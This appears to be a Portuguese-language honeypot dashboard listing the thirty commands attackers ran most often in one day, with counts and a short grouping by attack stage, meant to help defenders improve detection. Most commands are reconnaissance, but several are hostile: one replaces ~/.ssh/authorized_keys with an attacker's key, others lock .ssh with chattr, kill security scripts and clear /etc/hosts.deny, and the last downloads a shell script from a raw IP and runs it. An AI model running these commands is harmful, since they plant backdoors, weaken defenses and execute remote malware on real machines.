Comandos Executados
Analise em tempo real dos comandos mais executados por atacantes apos obter acesso ao sistema. Dados coletados da nossa rede global de honeypots nas ultimas 24 horas.
9789 comandos em 24h
Top Comandos Executados
1.
$
Enter new UNIX password:277 IPs687x
2.
$
uname -s -v -n -m 2 > /dev/null151 IPs516x
3.
$
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version144 IPs469x
4.
$
lockr -ia .ssh337 IPs468x
5.
$
cd ~; chattr -ia .ssh; lockr -ia .ssh296 IPs391x
6.
$
uname -a284 IPs379x
7.
$
uname286 IPs376x
8.
$
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~292 IPs375x
9.
$
cat /proc/cpuinfo | grep name | wc -l288 IPs373x
10.
$
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'289 IPs371x
11.
$
uname -m276 IPs366x
12.
$
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'279 IPs363x
13.
$
crontab -l275 IPs361x
14.
$
whoami276 IPs361x
15.
$
w276 IPs359x
16.
$
lscpu | grep Model273 IPs357x
17.
$
cat /proc/cpuinfo | grep model | grep name | wc -l273 IPs356x
18.
$
top270 IPs355x
19.
$
which ls267 IPs344x
20.
$
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'266 IPs340x
21.
$
ls -lh $(which ls)258 IPs317x
22.
$
cat /proc/uptime 2 > /dev/null | cut -d. -f157 IPs301x
23.
$
uname -m 2 > /dev/null57 IPs159x
24.
$
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;73 IPs75x
25.
$
/bin/./uname -s -v -n -r -m15 IPs37x
26.
$
uname -s -v -n -r -m13 IPs28x
27.
$
if [ [ ! -d ${HOME}/.ssh ] ]6 IPs15x
28.
$
then6 IPs15x
29.
$
nproc6 IPs14x
30.
$
cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android4 IPs13x
Reconhecimento
Comandos para obter informacoes do sistema (uname, whoami, cat /etc/passwd)
Download
Comandos para baixar malware (wget, curl, tftp)
Persistencia
Comandos para manter o acesso (crontab, chmod, chattr)
Movimento Lateral
Comandos para se expandir na rede (ssh, scp, ping)
Sobre estes dados
Estes comandos sao capturados em tempo real quando atacantes obtem acesso aos nossos honeypots. Representam as tecnicas reais utilizadas em ataques automatizados e manuais. Utilize esta informacao para melhorar sua deteccao de ameacas e resposta a incidentes.